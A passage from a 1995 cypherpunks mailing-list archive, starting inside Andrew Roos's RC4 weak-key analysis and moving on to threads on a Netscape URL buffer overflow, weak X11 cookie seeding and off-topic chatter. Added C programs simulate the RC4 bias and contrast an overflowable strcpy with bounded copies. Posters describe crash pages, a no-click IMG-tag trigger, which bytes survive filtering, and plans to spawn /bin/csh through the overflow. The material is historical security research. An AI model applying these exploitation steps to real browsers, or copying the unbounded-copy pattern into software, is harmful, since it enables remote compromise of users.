(when calculating the sum of key elements, the key is considered to "wrap
around" on itself).

Given this analysis, we can calculate the probability for each element of the
state table that its value is the "most likely value" of B above. The easiest
way to do this is to evaluate the state tables produced from a number of
pseudo-randomly generated RC4 keys. The following table shows the results for
the first 47 elements from a trial of 100 000 eighty-bit RC4 keys:

          Probability (%)

0-7       37.0  36.8  36.2  35.8  34.9  34.0  33.0  32.2
8-15      30.9  29.8  28.5  27.5  26.0  24.5  22.9  21.6
16-23     20.3  18.9  17.3  16.1  14.7  13.5  12.4  11.2
24-31     10.1   9.0   8.2   7.4   6.4   5.7   5.1   4.4
32-39      3.9   3.5   3.0   2.6   2.3   2.0   1.7   1.4
40-47      1.3   1.2   1.0   0.9   0.8   0.7   0.6   0.6

The table confirms that there is a significant correlation between the first
few values in the state table and the "likely value" predicted by B.


3.  WEAK KEYS

The RC4 state table is used to generate a pseudo-random stream which is XORed
with the plaintext to give the ciphertext. The algorithm used to generate the
stream is as follows:

     x and y are initialized to 0.

     To generate each byte:

1    x = (x + 1) % 256;
2    y = (state[x] + y) % 256;
3    swap_byte(&state[x], &state[y]);
4    xorIndex = (state[x] + state[y]) % 256;
5    GeneratedByte = state[xorIndex];

One way to exploit our analysis of the state table is to find circumstances
under which one or more generated bytes are strongly correlated with a small
subset of the key bytes.

Consider what happens when generating the first byte if state[1] == 1.

1    x = (0 + 1) % 256;                  /* x == 1 */
2    y = (state[1] + 0) % 256;           /* y == 1 */
3    swap_byte(&state[1], &state[1]);    /* no effect */
4    xorIndex = (state[1] + state[1]);   /* xorIndex = 2 */
5    GeneratedByte = state[2];

And we know that state[2] has a high probability of being

     S[2] = K[0] + K[1] + K[2] + 2 (2+1) / 2

Similarly,

     S[1] = K[0] + K[1] + 1 (1+1) / 2

So to make it probable that S[1] == 1, we have:

     K[0] + K[1] == 0 (mod 256)

In which case the most likely value for S[2] is:

     S[2] = K[2] + 3

This allows us to identify a class of weak keys:

C.   Given an RC4 key K[0]..K[N] with K[0] + K[1] == 0 (mod 256), there is a
     significant probability that the first byte generated by RC4 will be
     K[2] + 3 (mod 256).

Note that there are two special cases, caused by "unexpected" swapping during
key generation. When K[0]==1, the "expected" output byte is K[2] + 2, and when
K[0]==2, the expected value is K[2] + 1.

There are a number of similar classes of "weak keys" which only affect a few
keys out of every 65536. However the particular symmetry in this class means
that it affects one key in 256, making it the most interesting instance.

Once again I took the easy way out and used simulation to determine the
approximate probability that result C holds for any given key. Probabilities
ranged between 12% and 16% depending on the values of K[0] and K[1], with a
mean of about 13.8%. All these figures are significantly greater than the
0.39% which would be expected from an uncorrelated generator. The key length
used was again 80 bits. This works the other way around as well: given the
first byte B[0] generated by a weak key, the probability that K[2]==B[0]-3
(mod 256) is 13.8%.

       

4.  EXPLOITING WEAK KEYS IN RC4

Having found a class of weak keys, we need a practical way to attack RC4 based
cryptosystems using them. The most obvious way would be to search potential
weak keys first during an exhaustive attack. However since only one in every
256 keys is weak, the effective reduction in search space is not particularly
significant.

The usefulness of weak keys does increase if the opponent is satisfied with
recovering only a percentage of the keys subjected to analysis. Given a known
generator output which includes the first generated byte, one could assume
that the key was weak and search only the weak keys which would generate the
known initial byte. Since 1 in 256 keys is weak, and there is a 13.8% chance
that the assumed value of K[2] will be correct, there is only a 0.054% chance
of finding the key this way. However, you have reduced the search space by 16
bits due to the assumed relationship between K[0] and K[1] and the assumed
value of K[2], so the work factor per key recovered is reduced by a factor of
35, which is equivalent to reducing the effective key length by 5.1 bits.

However in particular circumstances, the known relationships between weak keys
may provide a much more significant reduction in workload. The remainder of
this section describes an attack which, although requiring very specific
conditions, illustrates the potential threat.

As a stream cipher, a particular RC4 key can only be used once. When multiple
communications sessions are required, some mechanism must be provided for
generating a new session key each time. Let us suppose that an implementation
chose the simple method of incrementing the previous session key to get the
new session key, and that the session key was treated as a "little endian"
(least significant byte first) integer for this purpose.

We now have the interesting situation that the session keys will "cycle
through" weak keys in a pattern which repeats every 2^16 keys:

00 00 00 ...    Weak
(510 non-weak keys)
FF 01 00 ...    Weak
(254 non-weak keys)
FE 02 00 ...    Weak
(254 non-weak keys)
FD 03 00 ...    Weak
...
01 FF 00 ...    Weak
(254 non-weak keys)
00 00 01 ...    Weak
(510 non-weak keys)
FF 01 01 ...    Weak

(Least significant byte on the left)

Now while an isolated weak key cannot be identified simply from a known
generator output, this cycle of weak keys at known intervals can be identified
using statistical techniques since each of the weak keys has a higher than
expected probability of generating the _same_ initial byte. This means that an
opponent who knew the initial generated bytes of about 2^16 session keys could
identify the weak keys, and would also be able to locate the 510-key gap
between successive cycles of weak keys (although not precisely). Since the
510-key gap occurs immediately following a key which begins with 00 00, the
opponent not only knows that the keys are weak, but also knows the first two
bytes of each key. The third byte of each key can be guessed from the first
output byte generated by the key, with a 13.8% chance of a correct guess.
Assuming that the "510-key gap" is narrowed down to 1 of 8 weak keys, the
attacker can search a key space which is 24 bits less than the size of the
session keys, with a 13.8%/8 chance of success, effectively reducing the key
space by approximately 18 bits.

Although this particular attack depends on a very specific set of
circumstances, it is likely that other RC4 based cryptosystems in which there
are linear relationships between successive session keys could be vulnerable
to similar attacks.


5.  RECOMMENDATIONS

The attacks described in this algorithm result from inadequate "mixing" of key
bytes during the generation of the RC4 state table. The following measures
could be taken to strengthen cryptosystems based on the RC4 algorithm:

(a) After initializing the algorithm, generate and discard a number of bytes.
    Since the algorithm used to generate bytes also introduces additional
    non-linear dependencies into the state table, this would make analysis
    more difficult.

(b) In systems which require multiple session keys, ensure that session keys
    are not linearly related to each other.

(c) Avoid using the weak keys described.


6.  CONCLUSION

This preliminary analysis of RC4 shows that the algorithm is vulnerable to
analytic attacks based on statistical analysis of its state table. It is
likely that a more detailed analysis of the algorithm will reveal more
effective ways to exploit the weaknesses described.



Andrew Roos <andrewr@vironix.co.za>

 -----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQCVAwUBMGLAk2atuqa4OR+lAQGYJQQA1W2r/giH1iPxeLRjooPEvAJJO2GHrBNy
h1fjHhPf6uBhBapEyZfN5utaUZYkkz/3tXJQC1p+17XwAJHGxb6kapHl3tAf2k5B
P7C034fo8WIOmam1GQqlG3c1MPjCvkNY02NEkYAmNtcwKMP96QgDMCbvS0kn55WE
L1GOWMVYqO4=
=iogI
 -----END PGP SIGNATURE-----
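
The simulations behind results B and C in the message above, and the effect of recommendation (a), can be reproduced with the C program below. It is an added example, not part of Andrew Roos's post; the splitmix64 generator, the function names and the 256-byte discard count are assumptions made here, while the 80-bit key length follows the post.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

#define KEY_LEN 10   /* 80-bit keys, the length used for the trials in the post */

typedef struct { uint8_t s[256]; uint8_t x, y; } rc4_t;

/* splitmix64: deterministic generator for reproducible trials (an assumption
 * made here; the post does not say how its keys were generated). */
static uint64_t rng_state;
static uint8_t rand_byte(void) {
    uint64_t z = (rng_state += 0x9E3779B97F4A7C15ULL);
    z = (z ^ (z >> 30)) * 0xBF58476D1CE4E5B9ULL;
    z = (z ^ (z >> 27)) * 0x94D049BB133111EBULL;
    return (uint8_t)((z ^ (z >> 31)) >> 56);
}

/* Key schedule as listed in section 2 (index1 is i % len, index2 is j). */
static void rc4_init(rc4_t *c, const uint8_t *key, size_t len) {
    unsigned i, j = 0;
    for (i = 0; i < 256; i++) c->s[i] = (uint8_t)i;
    for (i = 0; i < 256; i++) {
        j = (key[i % len] + c->s[i] + j) & 0xFF;
        uint8_t t = c->s[i]; c->s[i] = c->s[j]; c->s[j] = t;
    }
    c->x = c->y = 0;
}

/* One output byte, as listed in section 3. */
static uint8_t rc4_byte(rc4_t *c) {
    c->x = (uint8_t)(c->x + 1);
    c->y = (uint8_t)(c->y + c->s[c->x]);
    uint8_t t = c->s[c->x]; c->s[c->x] = c->s[c->y]; c->s[c->y] = t;
    return c->s[(uint8_t)(c->s[c->x] + c->s[c->y])];
}

/* Random key; weak != 0 forces K[0] + K[1] == 0 (mod 256). */
static void random_key(uint8_t *k, int weak) {
    for (int i = 0; i < KEY_LEN; i++) k[i] = rand_byte();
    if (weak) k[1] = (uint8_t)(0u - k[0]);
}

/* Result B: fraction of random keys whose state[e] after the key schedule
 * equals X(e) + e(e+1)/2, with the key wrapping around on itself. */
double state_hit_rate(unsigned e, unsigned trials, uint64_t seed) {
    unsigned hits = 0;
    rng_state = seed;
    for (unsigned t = 0; t < trials; t++) {
        uint8_t k[KEY_LEN];
        rc4_t c;
        unsigned sum = 0;
        random_key(k, 0);
        rc4_init(&c, k, KEY_LEN);
        for (unsigned i = 0; i <= e; i++) sum += k[i % KEY_LEN];
        if (c.s[e] == (uint8_t)(sum + e * (e + 1) / 2)) hits++;
    }
    return (double)hits / trials;
}

/* Result C and recommendation (a): fraction of keys for which the output
 * byte following `drop` discarded bytes equals K[2] + 3 (mod 256). */
double k2_hit_rate(int weak, unsigned drop, unsigned trials, uint64_t seed) {
    unsigned hits = 0;
    rng_state = seed;
    for (unsigned t = 0; t < trials; t++) {
        uint8_t k[KEY_LEN];
        rc4_t c;
        random_key(k, weak);
        rc4_init(&c, k, KEY_LEN);
        for (unsigned d = 0; d < drop; d++) (void)rc4_byte(&c);
        if (rc4_byte(&c) == (uint8_t)(k[2] + 3)) hits++;
    }
    return (double)hits / trials;
}

int main(void) {
    const unsigned n = 100000;
    for (unsigned e = 0; e <= 16; e += 8)
        printf("state[%2u] matches prediction B:    %.1f%%\n",
               e, 100 * state_hit_rate(e, n, 1));
    printf("weak keys, first byte == K[2]+3:   %.1f%%\n", 100 * k2_hit_rate(1, 0, n, 2));
    printf("random keys, first byte == K[2]+3: %.1f%%\n", 100 * k2_hit_rate(0, 0, n, 3));
    printf("weak keys, after discarding 256:   %.1f%%\n", 100 * k2_hit_rate(1, 256, n, 4));
    return 0;
}
```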




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Laurent Demailly <dl@hplyot.obspm.fr>
Date: Fri, 22 Sep 95 03:10:38 PDT
To: Jeff Simmons <jsimmons@goblin.punk.net>
Subject: Re: Netscape to end Linux support?
In-Reply-To: <199509212125.RAA00188@hoopsnake.cjs.net>
Message-ID: <9509221008.AA18570@hplyot.obspm.fr>
MIME-Version: 1.0
Content-Type: text/plain


Jeff Simmons writes:
 > > And the sad part is that now that they have announced that they are
 > > dropping their unofficial Linux support, I really want to hurt
 > > Netscape badly.
 > > Sigh.
 > Anyone got a pointer to this announcement?
 > Damn!  Just when I was starting to like them ...

Hmm, I was also thinking good about responsiveness on the security
issue (though the way they behave regarding html extensions is still
not fair imo, but that's another debate), and I have modified my
netscape security page accordingly, but, dropping Linux as the list of
UNIX supported host is certainly not a good thing at all, I
urge/pray/suggest... that listening Netscape folks here try to put
it back, PLEASE (It is not that difficult to compile under linux is it ?)

(source :
http://www.netscape.com/comprod/products/navigator/version_2.0/datasheet.html
[...]
SUPPORTED PLATFORMS 
[...]
UNIX: 
            Digital Equipment Corp. Alpha (OSF/1 2.0) 
            Hewlett-Packard 700-series (HP-UX 9.03) 
            IBM RS/6000 AIX 3.2 
            Silicon Graphics (IRIX 5.2) 
            Sun SPARC (Solaris 2.4, SunOS 4.1.3) 
            386/486/Pentium (BSDI) 
)
Or maybe it is just a missing item in the list ? [i hope!]

dl
--
Laurent Demailly * http://hplyot.obspm.fr/~dl/ * Linux|PGP|Gnu|Tcl|...  Freedom
Prime#1: cent cinq mille cent cinq milliards cent cinq mille cent soixante sept

Saddam Hussein Qaddafi [Hello to all my fans in domestic surveillance]
genetic Cocaine radar Ortega




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Laurent Demailly <dl@hplyot.obspm.fr>
Date: Fri, 22 Sep 95 03:15:46 PDT
To: Ray Cromwell <rjc@clark.net>
Subject: Re: Another Netscape Bug (and possible security hole)
In-Reply-To: <199509220612.CAA11441@clark.net>
Message-ID: <9509221014.AA18627@hplyot.obspm.fr>
MIME-Version: 1.0
Content-Type: text/plain


Ray Cromwell writes:
 > 
 > I've found a Netscape bug which I suspect is a buffer overflow and
 > may have the potential for serious damage. If it is an overflow bug,
 > then it may be possible to infect every computer which accesses a web
 > page with Netscape. To see the bug, create an html file containing
 > the following:
[...]
The shortest host length I've found to cause seg fault is 356 (yes, and
not 256, 256+100 if you prefer :))
You can have a look at http://hplyot.obspm.fr/~dl/netscapesec/ for a
'demo' (click to crash)


dl
--
Laurent Demailly * http://hplyot.obspm.fr/~dl/ * Linux|PGP|Gnu|Tcl|...  Freedom
Prime#1: cent cinq mille cent cinq milliards cent cinq mille cent soixante sept

Legion of Doom SEAL Team 6 Cocaine class struggle AK-47 jihad
fissionable




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Simmons <jsimmons@goblin.punk.net>
Date: Fri, 22 Sep 95 12:21:44 PDT
To: cypherpunks@toad.com
Subject: Netscape for Linux
Message-ID: <199509221917.MAA07561@goblin.punk.net>
MIME-Version: 1.0
Content-Type: text/plain


Found this on Comp.os.linux.misc - hope it's true:


Tobias Engel <s120808@fb1.fhtw-berlin.de> writes:

>I looked at the Data Sheet-Page for the Netscape Navigator 2.0 today (http://home.netscape.com/comprod/products/navigator/version_2.0/datasheet.html).
>There is a "Supported Platforms"-List at the end of the Page. For Unix it
>says:
>---
>Digital Equipment Corp. Alpha (OSF/1 2.0) 
>Hewlett-Packard 700-series (HP-UX 9.03) 
>IBM RS/6000 AIX 3.2 
>Silicon Graphics (IRIX 5.2) 
>Sun SPARC (Solaris 2.4, SunOS 4.1.3) 
>386/486/Pentium (BSDI) 
>---

>So, where is Linux???

In comp.infosystems.www.browsers.x Jamie Zawinski <jwz@netscape.com>
said that there *will* be a 2.0 version for Linux.  He also explained
why Linux isn't listed and why Netscape will tell you that there
will not be a supported version of Netscape for Linux.
This is a copy of that article, which is worth reposting here, I think,
because of the large threads about this subject:


From: Jamie Zawinski <jwz@netscape.com>
Newsgroups: comp.infosystems.www.browsers.x
Subject: Re: Netscape 2.0 for Linux
Organization: Netscape Communications
Date: Wed, 20 Sep 1995 16:11:19 -0700

Marco Trincardi wrote:
>
> There will be a Linux version of the new upcoming Netscape 2.0 ???
> At Netscape HomePage I didn't find useful info.

And I replied:
> 
> Yes, once 2.0 is released (please don't ask me when) it will be
> available for all platforms on which 1.1 is available.

Since then, it would seem that some folks have called our customer
support lines and gotten a seemingly different answer, so allow me to
clarify:

When someone in customer support tells you "we will not be supporting
Linux in Netscape 2.0," they're right: but that's because we didn't
support it in 1.0 or 1.1 either.  "Support" means we sell the software,
and you can buy a support contract.  This is not, and has never been the
case for Linux.  You have never been able to get a *supported* version
of Netscape Navigator for Linux.  We have no Linux *product*; our sales
and support folks don't deal with it in any way, and never have.

However, there has been an unsupported educational/evaluation version
available for that platform, and this will also be the case for 2.0.

-- 
Jamie Zawinski    jwz@netscape.com   http://www.netscape.com/people/jwz/


-- 
--    Jos Vos <jos@xos.nl>
--    X/OS Experts in Open Systems BV   |   Phone: +31 20 6938364
--    Amsterdam, The Netherlands        |     Fax: +31 20 6948204




-- 
Jeff Simmons                           jsimmons@goblin.punk.net



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: goedel@tezcat.com (Dietrich J. Kappe)
Date: Fri, 22 Sep 95 10:38:08 PDT
To: cypherpunks@toad.com
Subject: Netscape bug and the IMG tag.
Message-ID: <v01510100ac88b1f03e28@[206.1.161.4]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

You can plunk a nasty url into the SRC field of an IMG tag, thus eliminating
the need for clicking on the offending url. Also, it makes it harder to
check the html of a page. Check out http://www.redweb.com/experiment/bug2
html if you feel like rebooting.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQBgAwUBMGMCc3If3YegbdiBAQFTMgJYsAEPkSWTtGDswAYpT1repQjd8n3unMg3
CIXNlxmg43BkMgyNRrqYP2P61aMJt4FwPZt+PgE4NYxVj6PzaPtsf/Y/6BSsWNxb
cKcr
=/ORS
-----END PGP SIGNATURE-----

Dietrich Kappe | Red Planet    http://www.redweb.com
Red Planet, LLC| "Chess Space" | "MS Access Products" |  PGP Public Key
1-800-RED 0 WEB|    /chess     |       /cobre         | /goedel/key.txt
Web Publishing | Key fingerprint: 8C2983E66AB723F9 A014A0417D268B84






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Arve Kjoelen <akjoele@shiva.ee.siue.edu>
Date: Fri, 22 Sep 95 10:42:02 PDT
To: cypherpunks@toad.com
Subject: Re: XDM has the same problem as netscape ?!
Message-ID: <199509221741.MAA27447@shiva.ee.siue.edu>
MIME-Version: 1.0
Content-Type: text/plain


Ian Goldberg wrote:

>Nelson Minar <nelson@santafe.edu> wrote:
>>Last time I looked, the MIT-MAGIC-COOKIE-1 scheme used in X11R4 had
>>the same problem: the random seed was based on the current time to the
>>microsecond, modulo the granularity of the system clock. I think I
>>figured that on my hardware, if I could figure out which minute the X
>>server started (easy with finger), I'd only have to try a few
>>thousand keys or so. Caveat: I never actually proved the idea.

>Wow.  I just checked, and Nelson's right.
>[ code extracts snipped]

I just checked X11R6, and the same method is used there, so it hasn't changed
since X11R4.

-Arve.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cman@communities.com (Douglas Barnes)
Date: Fri, 22 Sep 95 12:52:58 PDT
To: Ray Cromwell <rjc@clark.net>
Subject: Re: Another Netscape Bug (and possible security hole)
Message-ID: <v02120d01ac88cf556dd4@[199.2.22.120]>
MIME-Version: 1.0
Content-Type: text/plain



Spent too much time last night playing with the Netscape bug;
among other things wrote some code to throw various random binary
URLs at Netscape. Netscape seems prepared to swallow the bait
as long as the URL does _not_ contain characters screened as
follows:

 if ((c != '"') && (c!='>') && (c!=0) && (c!='/') ) {

This means you can't plant 0x00, 0x22, 0x3e or 0x2f.

Anything else can be made to show up in various registers
after things go blooey.  I've only made it segfault in
different places so far, still working on getting it to do
something it wouldn't ordinarily do and not crash before
it does it.

[Working under Solaris 2.4; I may try my luck on Macs, since
this bug crashes the whole OS... need to load up debug tools
first though.]

Hope this helps others...

Doug






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Fri, 22 Sep 95 10:04:27 PDT
To: cypherpunks@toad.com
Subject: Defense against a class of programming bugs
Message-ID: <9509221703.AA22917@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


In light of the continuing vulnerability to long user input, I humbly
offer the following aphorism, suitable for display on all Netscape
programmer cubicles:
	Copy strings with strdup, not strcpy.
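
Salz's rule in code, as an added example that is not part of the original post and is not Netscape's source: a hostname copied out of a URL with the unbounded strcpy pattern this thread is about, beside two bounded forms. The function names, the 64-byte buffer, the 253-byte limit, the hostname character check and the sample URLs are assumptions made for illustration.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define HOST_BUF     64   /* assumed size of the fixed host buffer */
#define MAX_HOST_LEN 253  /* longest DNS name in text form */
#define HOST_CHARS "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-."

/* Find the host in "scheme://host[:port][/path]"; *len gets its length. */
static const char *find_host(const char *url, size_t *len)
{
    const char *p = strstr(url, "://");
    if (p == NULL)
        return NULL;
    p += 3;
    *len = strcspn(p, "/:?#");
    return p;
}

/* BEFORE: the destination size is fixed and the source is never measured.
 * strcpy() writes until it meets a NUL in the input, so a URL whose tail
 * is HOST_BUF bytes or longer runs past the end of out. */
int copy_host_unsafe(const char *url, char out[HOST_BUF])
{
    size_t len;
    const char *h = find_host(url, &len);
    if (h == NULL)
        return -1;
    strcpy(out, h);    /* unbounded copy of the host and all that follows */
    out[len] = '\0';   /* trims the path, too late to prevent the overrun */
    return 0;
}

/* 1 if copy_host_unsafe() would write outside its buffer for this URL. */
int unsafe_would_overflow(const char *url)
{
    size_t len;
    const char *h = find_host(url, &len);
    return h != NULL && strlen(h) + 1 > HOST_BUF;
}

/* AFTER, strdup style: the destination is allocated from the measured
 * length of the source, so there is no fixed buffer to overrun (POSIX
 * strndup does the same job). Caller frees; NULL means "rejected". */
char *copy_host_dup(const char *url)
{
    size_t len;
    const char *h = find_host(url, &len);
    if (h == NULL || len == 0 || len > MAX_HOST_LEN || strspn(h, HOST_CHARS) < len)
        return NULL;
    char *out = malloc(len + 1);
    if (out == NULL)
        return NULL;
    memcpy(out, h, len);
    out[len] = '\0';
    return out;
}

/* AFTER, fixed buffer kept: input that does not fit is refused, never
 * truncated silently and never copied past outsz. */
int copy_host_bounded(const char *url, char *out, size_t outsz)
{
    size_t len;
    const char *h = find_host(url, &len);
    if (h == NULL || len == 0 || len >= outsz || strspn(h, HOST_CHARS) < len)
        return -1;
    memcpy(out, h, len);
    out[len] = '\0';
    return 0;
}

/* Constructed input: "http://" + n copies of 'a' + "/x". Caller frees. */
char *make_url(size_t n)
{
    char *u = malloc(n + 10);
    if (u != NULL) {
        memcpy(u, "http://", 7);
        memset(u + 7, 'a', n);
        memcpy(u + 7 + n, "/x", 3);
    }
    return u;
}

int main(void)
{
    char fixed[HOST_BUF];
    char *url = make_url(100);   /* 100-byte host: too big for fixed[] */
    if (url == NULL)
        return 1;
    char *dup = copy_host_dup(url);
    printf("strcpy overflows=%d bounded=%d dup=%s\n",
           unsafe_would_overflow(url),
           copy_host_bounded(url, fixed, sizeof fixed),
           dup ? "copied" : "rejected");
    free(dup);
    free(url);
    return 0;
}
```

copy_host_unsafe is kept for contrast only; main never hands it the oversized URL.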




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jiri Baum <jirib@cs.monash.edu.au>
Date: Thu, 21 Sep 95 20:14:06 PDT
To: cwe@Csli.Stanford.EDU (Christian Wettergren)
Subject: Re: Exchange random numbers (was: Re: netscape's response)
In-Reply-To: <199509211852.LAA22259@Csli.Stanford.EDU>
Message-ID: <199509220312.NAA15933@molly.cs.monash.edu.au>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hello stewarts@ix.netcom.com, cypherpunks@toad.com, jsw@netscape.com
  and Christian Wettergren <cwe@Csli.Stanford.EDU>

Christian Wettergren <cwe@Csli.Stanford.EDU> wrote:
...
> | If I only ever give out a hash of my seed, and only ever *add* any received
> | info to my seed (and stir it in well), how can anyone find out anything?
> | (Apart from hash weaknesses.)
> 
> Giving out contribution: 
>      MD5(select_bits(my_seed, start_bit, stop_bit)) -> remote
> Taking in contribution : 
>      my_seed = my_seed XOR 
>      ((select_low_bits(remote_contrib, contrib_width) << contrib_area)

Hmm, I use:
  taking-in:
	seed = MD5(seed,new-data)
  giving-out:
	MD5(seed)

(where every giving-out is preceded by a taking-in). Is that OK?
If not, why not and how can I improve it?

> You also need to keep track of who has contributed what, and how much.
...

Why? I guess to keep track of how much entropy I believe I have...

> This might become a problem if you don't have a safe authentication
> mechanism, like basing the tracking on the IP-numbers etc.

That's a safe authentication mechanism? I don't think so.
But you need a secrecy mechanism, so I guess that's where you'd
add your auth.

...
> The boot-strap stage is actually the big problem still. But if the
...

The boot-strap is done only once (at install time) so it's not a big
problem to ask for lots of random text from user.

...
> | In any case, accepting donations of entropy cannot possibly reduce the
> | amount of entropy I have, can it?
> 
> This isn't a problem as I see it, he'll only know what bits he
> flipped, not the actual state.

Good, I thought so.

Sorry, have to go now, rest later...

Jiri
- --
<jirib@cs.monash.edu.au>     <jiri@melb.dialix.oz.au>     PGP 463A14D5

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQCVAwUBMGIpgixV6mvvBgf5AQGRggQAwEcY+5N0stTbWXfXg3zQ6FNdzv9Sckds
3xAjLbxr85jS98Sj0Nm++DwS674U8YfrNzTRg3HnOBUcS+i8UvP445jtj4UiyxU8
hyM2ZvzBWjFuj35jXF4KR5XotZyvAsAcICsssv0UQZ3JKWV+tU/pN8sZ3sgKRRWZ
ipvAFyY+rhA=
=1d8P
-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Fri, 22 Sep 95 10:14:04 PDT
To: perry@piermont.com
Subject: Re: Another Netscape Bug (and possible security hole)
In-Reply-To: <199509221236.IAA03762@frankenstein.piermont.com>
Message-ID: <199509221713.NAA11980@clark.net>
MIME-Version: 1.0
Content-Type: text/plain


Perry writes:
> > These buffer overflow bugs should be taught in every programming
> > 101 course along with fencepost errors.
> > 
> > I'm not even sure if I want to write the obligatory program to exploit
> > the hack given that some malicious jerk would probably use it
> > on his home page to attack people.
> 
> The problem is that if you don't produce a (benign) exploit people
> aren't going to take it seriously enough.

  Yeah, I guessed that. I'll work on it, I have a few doubts I have
to research first. For instance, how to embed code in the domain that
1) server/client processing won't "cook" and 2) contains no isolated
zero bytes which would null terminate the string.

  My current idea is to look in Netscape for an "exec" routine,
and call it passing a "/bin/csh" to it.

  Regardless, it's a nasty bug given that you can crash anyone's
Netscape. And on Mac/Win3.1, it may even require a reboot.

-Ray
 

 

  






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Thomas Grant Edwards <tedwards@Glue.umd.edu>
Date: Fri, 22 Sep 95 10:18:08 PDT
To: "Dietrich J. Kappe" <goedel@tezcat.com>
Subject: Re: Another Netscape Bug (and possible security hole)
In-Reply-To: <v01510100ac8821ac2b23@[206.1.161.4]>
Message-ID: <Pine.SUN.3.91.950922131402.16290E-100000@hertz.isr.umd.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 22 Sep 1995, Dietrich J. Kappe wrote:

> Netscape 1.1N on a powermac crashes hard on that url. If anyone wants to try
> it out, I've put up a simple page with the url at
> http://www.redweb.com/experiment/bug.html

Netscape also crashes (error 1) on regular Macs...sigh.  I'm contacting
someone who just wrote a http server to see how tough it would be to drop
some code on the stack.

-Thomas





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mjsus@atlanta.com
Date: Fri, 22 Sep 95 10:23:09 PDT
To: Black Unicorn <unicorn@polaris.mindport.net>
Subject: business intelligence or BI
Message-ID: <199509221726.NAA17033@atlanta.com>
MIME-Version: 1.0
Content-Type: text/plain


>It's important here to distinguish economic "espionage" and economic
>"intelligence."
>

There is also the difference between the business intelligence and business
espionage !

The business intelligence is used to collect, evaluate, analyze etc. the
business information and data that may include competitors, markets,
economic trends, suppliers among others. The sources of this information are
publicly and legally available for all companies and individuals. The formal
or informal business intelligence system can be used. The successful use of
the traditional business intelligence will result in the best results, when
this information and data is evaluated, analyzed and disseminated in the
most intelligent, reliable, timely and accurate manner. 100% of companies
are already using the business intelligence (all companies are just not
calling it the BI): some more successfully than others. The business
intelligence can be used both for strategic and tactical purposes.

                                                        Regards,

                                                        Mark





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ab411@detroit.freenet.org (David R. Conrad)
Date: Fri, 22 Sep 95 10:20:35 PDT
To: cypherpunks@toad.com
Subject: (noise) Subject: Married with Children (was: Re: Netscape closes up 1 3/8 today!)
Message-ID: <199509221720.NAA17055@detroit.freenet.org>
MIME-Version: 1.0
Content-Type: text/plain




-----BEGIN PGP SIGNED MESSAGE-----

Christopher J. Shaulis <cjs@netcom.com> writes:

> Yeah. That's the way it works sometimes. I remember back when that
> housewife from Minnesota launched her media campaign to have "Married
> With Children" taken off the air. All it did was make the show a
> hundred times more popular and extend its life for years after it
> probably would have been canceled on its own.

Terry Rakolta is from Bloomfield Hills, Michigan, just a few short miles
from where I sit, typing at my keyboard.  After being offended by the
episode "Her Cups Runneth Over", Rakolta took notes on things she found
offensive in subsequent episodes and then mailed a complaint to Fox.

Fox's reaction?  According to executive producer Michael Moye, "Everybody
did the manly thing which was immediately dive behind desks and point the
finger at us.  You couldn't get your legs under a desk for all the
executives under there.  You have never seen such wussing.  And we're
going, 'One letter?  *One letter?*'"  [emphasis his]

The resulting media incident almost certainly increased the show's
ratings, but it also brought the wrath of the Fox censor down on the
producers.  For an interesting account of this, see Playboy, July 1990,
(the one with Sharon Stone topless on the cover ;), "Hanging out with
the Bundys", Pamela Marin, p.114 et seq.

Something else which has happened here in the Greater Detroit SMSA, just
in the last few days, is the mother of a ten year old boy has demanded
that _The_Stand_ by Stephen King be removed from the school's library
after her son checked it out from said library.  Turns out Stephen
included some graphic descriptions of sex.  The punch line, if you like,
is that in tv news coverage the young lad was shown sitting in front of
the tv, playing a Mario-like video game.

Thank God they got that book away from him just in the nick of time, eh?
He might be reading even as we speak!

        They walked still further and the girl said, "Is it true that
    long ago firemen put fires *out* instead of going to start them?"
        "No."
                                                       -- Ray Bradbury


``Officer, officer, arrest that man!  He's whistling a dirty song.''
                                                       -- Jean Ellison

Crypto relevance?  None.

drc

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMGLunREcrOJethBVAQFnbwP/SI1df4BtSIOZryK+pcoatMy7jePQQF4W
fj6cONy6ulf/0KqswS1md91qZMUKJ0EpCJGf+qbaXTblASCZ08spGlgZ3rp0yYiK
wGlWEHxatgqbrSO6XKJAEAIccd2aArtpnWPBfnnXpCGaSXQ4lLrg+/a3b+q9JZ9m
BvLSyhaTqkM=
=Ijia
-----END PGP SIGNATURE-----

--
David R. Conrad, conrad@detroit.freenet.org, http://www.grfn.org/~conrad
Hardware & Software Committee  --  Finger conrad@grfn.org for public key
Key fingerprint =  33 12 BC 77 48 81 99 A5  D8 9C 43 16 3C 37 0B 50
No, his mind is not for rent to any god or government.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ab411@detroit.freenet.org (David R. Conrad)
Date: Fri, 22 Sep 95 10:24:42 PDT
To: cypherpunks@toad.com
Subject: Re: Another Netscape Bug (and possible security hole)
